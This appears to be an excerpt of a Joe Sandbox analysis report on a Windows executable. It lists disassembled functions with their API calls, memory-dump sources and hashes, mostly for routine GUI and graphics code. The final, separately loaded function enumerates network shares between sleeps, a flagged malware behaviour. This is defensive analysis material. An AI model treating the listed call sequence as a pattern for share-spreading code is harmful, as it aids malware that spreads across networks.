                                    APIs
                                    • GetModuleHandleA.KERNEL32(USER32,00000000,-00000024,753D4A40,004A9CBB,?,?,?,?,?,?,?,004BFEA5,00000000,00000002,00000028), ref: 004A9BA4
                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 004A9BBC
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 004A9BCD
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004A9BDE
                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 004A9BEF
                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 004A9C00
                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004A9C11
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressProc$HandleModule
                                    • String ID: EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                    • API String ID: 667068680-2376520503
                                    • Opcode ID: e5d5d1f69fab0b17f45f0b6bb4eefafae162806b55feb7efad9174a4f355ade1
                                    • Instruction ID: 1f53a15bfc6d92f99bc7c3d61e83e554414ccc8485ee9baa28f01de541fecce2
                                    • Opcode Fuzzy Hash: e5d5d1f69fab0b17f45f0b6bb4eefafae162806b55feb7efad9174a4f355ade1
                                    • Instruction Fuzzy Hash: 4811B6B0D006119A87105F26AEC08AEBEE1F71E760758953FF004D7260CF7889C18B64
                                    Function 004300A0 Relevance: 23.1, APIs: 12, Strings: 1, Instructions: 354COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 004300EE
                                    • GetClientRect.USER32(?,?), ref: 00430189
                                    • CreateRectRgn.GDI32 ref: 004301FA
                                    • CombineRgn.GDI32(?,?,004DD0DC,00000004), ref: 0043022B
                                    • SetRect.USER32(?,00000000,?,?,?), ref: 00430282
                                    • IntersectRect.USER32(?,?,?), ref: 0043028F
                                    • IsRectEmpty.USER32(?), ref: 004302BA
                                    • __ftol.LIBCMT ref: 00430398
                                    • __ftol.LIBCMT ref: 004303A5
                                    • CreateRectRgn.GDI32(00000000,?,00000000,00000000), ref: 004303FE
                                    • CombineRgn.GDI32(?,?,004DD0DC,00000004), ref: 0043042F
                                      • Part of subcall function 0043A5C0: SetStretchBltMode.GDI32(?,00000000), ref: 0043A5D4
                                      • Part of subcall function 0043A5C0: GetObjectA.GDI32(?,00000018,?), ref: 0043A6B2
                                    • FillRgn.GDI32(?,?,00000000), ref: 004304AC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Create$Combine__ftol$ClientEmptyFillIntersectModeObjectStretch
                                    • String ID: pTL
                                    • API String ID: 2054119908-168633513
                                    • Opcode ID: 44a4116cd90188d78f8853082c170a7996fbb5297af962c5201967ee3bc6fb8a
                                    • Instruction ID: a2fce783a00ac98e15997765672e2f41d574a02cf86a869b39acea016fb9cca3
                                    • Opcode Fuzzy Hash: 44a4116cd90188d78f8853082c170a7996fbb5297af962c5201967ee3bc6fb8a
                                    • Instruction Fuzzy Hash: 0DD18B71508340AFC714CF29C894E6BBBE8FBD8354F188A1EF89993251DB34E905CB66
                                    Function 00437DF0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 183memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStockObject.GDI32(0000000F), ref: 00437E44
                                    • GetObjectA.GDI32(?,00000018,?), ref: 00437E57
                                    • GlobalAlloc.KERNEL32(00000002,00000028), ref: 00437EC6
                                    • GlobalFix.KERNEL32(00000000), ref: 00437EE4
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000000,00000000), ref: 00437F13
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00437F69
                                    • GlobalReAlloc.KERNEL32(00000000,?,00000002), ref: 00437F72
                                    • GlobalFix.KERNEL32(00000000), ref: 00437F7F
                                    • GetDIBits.GDI32(?,?,00000000,?,00000000,00000000,00000000), ref: 00437FA2
                                    • GlobalUnWire.KERNEL32(00000000), ref: 00437FBC
                                    • GlobalFree.KERNEL32(00000000), ref: 00437FC3
                                      • Part of subcall function 004C2EEE: __EH_prolog.LIBCMT ref: 004C2EF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Global$AllocBitsObjectWire$FreeH_prologStock
                                    • String ID: (
                                    • API String ID: 1902819324-3887548279
                                    • Opcode ID: 4ee581e3124c917d655d38198055d8af94be161692f1b4bef99daecbca818913
                                    • Instruction ID: d3f1502440893c6c9632f1d6f1ceb6540657238b1813271e12b6ea55dc063580
                                    • Opcode Fuzzy Hash: 4ee581e3124c917d655d38198055d8af94be161692f1b4bef99daecbca818913
                                    • Instruction Fuzzy Hash: 706147B65083409FC360DF54CC45F6BBBE8FB88B10F14492DFA8597290DB78A805CBA6
                                    Function 00451610 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 331threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 0045177B
                                    • CreateSemaphoreA.KERNEL32(00000000,00000014,00000014,00000000), ref: 00451790
                                    • RtlInitializeCriticalSection.NTDLL(?), ref: 004517BB
                                    • CreateThread.KERNEL32(00000000,00000000,004519F0,?,00000004,?), ref: 004517F0
                                    • RtlEnterCriticalSection.NTDLL(005DFE00), ref: 00451802
                                    • RtlLeaveCriticalSection.NTDLL(005DFE00), ref: 004519B5
                                    • ResumeThread.KERNEL32(?), ref: 004519C3
                                    • ReleaseSemaphore.KERNEL32(?,00000014,00000000), ref: 004519D5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateCriticalSection$SemaphoreThread$EnterEventInitializeLeaveReleaseResume
                                    • String ID: RIFF$WAVE$data$fmt
                                    • API String ID: 1802393137-4212202414
                                    • Opcode ID: c82d0244857dd576a1e991a73c2c5af32e02a0448dbc881dee9be541b6a247a4
                                    • Instruction ID: 32bb62c2118d6c7ff621b82de89de6f3551add73c7cfa4e74e4189c6e57df254
                                    • Opcode Fuzzy Hash: c82d0244857dd576a1e991a73c2c5af32e02a0448dbc881dee9be541b6a247a4
                                    • Instruction Fuzzy Hash: 2FB1E5B1A003005BD724DB65DC81B2B77D5FB98309F08462FFD46973A2E678E909CB99
                                    Function 004315C0 Relevance: 19.7, APIs: 13, Instructions: 187windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Parent$ActiveChildEnabledFocusUpdateVisible
                                    • String ID:
                                    • API String ID: 983273251-0
                                    • Opcode ID: 1c20adb9caf01d9e8c238c7a2cbd8fc9a3ba447d8fbb9d2d46212052c683f63f
                                    • Instruction ID: d0ee7b405dc84d6758ee9607d333bf151f78701b95fbc3be30bf4e304a655365
                                    • Opcode Fuzzy Hash: 1c20adb9caf01d9e8c238c7a2cbd8fc9a3ba447d8fbb9d2d46212052c683f63f
                                    • Instruction Fuzzy Hash: 4051A071A003059BD724AF71DC80A6BBBA8BF58344F14592FF95697220DB38E845CBA9
                                    Function 00418D20 Relevance: 19.7, APIs: 10, Strings: 1, Instructions: 430COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 00418D67
                                    • GetClientRect.USER32(?,?), ref: 00418D7F
                                    • InflateRect.USER32(?,?,?), ref: 00418E3D
                                    • IntersectRect.USER32(?,?,?), ref: 00418EA7
                                    • CreateRectRgn.GDI32(?,?,?,?), ref: 00418EC1
                                    • FillRgn.GDI32(?,?,?), ref: 00419080
                                    • GetCurrentObject.GDI32(?,00000006), ref: 004190FF
                                      • Part of subcall function 004C273C: GetStockObject.GDI32(?), ref: 004C2745
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C275F
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C276A
                                    • OffsetRect.USER32(?,00000001,00000001), ref: 004191DD
                                    • OffsetRect.USER32(?,00000002,00000002), ref: 00419271
                                    • OffsetRect.USER32(?,00000001,00000001), ref: 00419224
                                      • Part of subcall function 004C290C: SetTextColor.GDI32(?,?), ref: 004C2926
                                      • Part of subcall function 004C290C: SetTextColor.GDI32(?,?), ref: 004C2934
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Object$Offset$ColorSelectText$BeginClientClipCreateCurrentEmptyFillH_prologInflateIntersectPaintStock
                                    • String ID: pTL
                                    • API String ID: 4264835570-168633513
                                    • Opcode ID: 3303dbe5808f1e1d2dc937c74ae9933ff0448913140c14c8b12f8b9b1a5c502d
                                    • Instruction ID: f97c57c7c19acf09dc4ff5a4ad2a4a190b462773c5fb80a7c02beeea03b1015a
                                    • Opcode Fuzzy Hash: 3303dbe5808f1e1d2dc937c74ae9933ff0448913140c14c8b12f8b9b1a5c502d
                                    • Instruction Fuzzy Hash: C20267715083819FD324DF65C894FABB7E9BBC8304F004D1EF19687280DBB8A989CB56
                                    Function 004BFDBD Relevance: 19.7, APIs: 13, Instructions: 174windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    • GetParent.USER32(?), ref: 004BFDE8
                                    • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 004BFE0B
                                    • GetWindowRect.USER32(?,?), ref: 004BFE24
                                    • GetWindowLongA.USER32(00000000,000000F0), ref: 004BFE37
                                    • CopyRect.USER32(?,?), ref: 004BFE84
                                    • CopyRect.USER32(?,?), ref: 004BFE8E
                                    • GetWindowRect.USER32(00000000,?), ref: 004BFE97
                                    • CopyRect.USER32(?,?), ref: 004BFEB3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$Copy$Long$MessageParentSend
                                    • String ID:
                                    • API String ID: 808654186-0
                                    • Opcode ID: b105c7b58090c70c13095b95fd611205e4fa4000bdee4713b06382bce92b112b
                                    • Instruction ID: 0a829d4510f065a4fbfcf7b71b24c7ca1c80583a57a4d4a66b8abc37c7531c91
                                    • Opcode Fuzzy Hash: b105c7b58090c70c13095b95fd611205e4fa4000bdee4713b06382bce92b112b
                                    • Instruction Fuzzy Hash: 70515072900219ABDB14DBA8DC85EFEBBBDAB44314F15413AF505F3291D734ED0A8B68
                                    Function 00439780 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 405COMMON
                                    Download Yara Rule
                                    APIs
                                    • InflateRect.USER32(?,?,?), ref: 00439826
                                      • Part of subcall function 00439550: SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00439639
                                      • Part of subcall function 00439550: OffsetRect.USER32(?,?,?), ref: 00439646
                                      • Part of subcall function 00439550: IntersectRect.USER32(?,?,?), ref: 00439662
                                      • Part of subcall function 00439550: IsRectEmpty.USER32(?), ref: 0043966D
                                    • InflateRect.USER32(?,?,?), ref: 00439899
                                    • CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00439A9D
                                    • GetClipRgn.GDI32(?,00000000), ref: 00439AAC
                                    • CreatePolygonRgn.GDI32 ref: 00439B2A
                                    • SelectClipRgn.GDI32(?,?), ref: 00439C0D
                                    • CreatePolygonRgn.GDI32(?,00000005,00000002), ref: 00439C30
                                    • SelectClipRgn.GDI32(?,?), ref: 00439CB1
                                    • DeleteObject.GDI32(?), ref: 00439CC7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ClipCreate$InflatePolygonSelect$DeleteEmptyIntersectObjectOffset
                                    • String ID: gfff$pTL
                                    • API String ID: 1105800552-1168745580
                                    • Opcode ID: e0353ef053410e9e3b50c25c9f7ca320606756af5b356f3d7af950faf814cbbe
                                    • Instruction ID: ef252ab02b5c95fa58538530cb9db51aa8131feb03557d80647900f4c7aa7c8f
                                    • Opcode Fuzzy Hash: e0353ef053410e9e3b50c25c9f7ca320606756af5b356f3d7af950faf814cbbe
                                    • Instruction Fuzzy Hash: 7EF125B46083419FD364CF29C980B6BBBE5BFC8304F148A2EF99987351DB74A905CB56
                                    Function 0242C875 Relevance: 19.6, APIs: 13, Instructions: 147sleepstringshareCOMMON
                                    Download Yara Rule
                                    APIs
                                    • Sleep.KERNEL32(00000400), ref: 0242C8D1
                                    • WNetOpenEnumA.MPR(00000002,00000000,00000000,?,00000000), ref: 0242C8E5
                                    • GlobalAlloc.KERNEL32(00000040,00007F80), ref: 0242C916
                                    • WNetEnumResourceA.MPR(00000000,FFFFFFFF,?,00008000), ref: 0242C94E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 0242C9C5
                                    • CharUpperA.USER32(?), ref: 0242C9CF
                                    • lstrcat.KERNEL32(?,024A5668), ref: 0242C9DE
                                    • lstrlen.KERNEL32(?,?), ref: 0242C9EC
                                    • Sleep.KERNEL32(00001000), ref: 0242CA18
                                    • GetLastError.KERNEL32 ref: 0242CA25
                                    • Sleep.KERNEL32(00002000), ref: 0242CA39
                                    • GlobalFree.KERNEL32(?), ref: 0242CA48
                                    • WNetCloseEnum.MPR(00000000), ref: 0242CA52
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
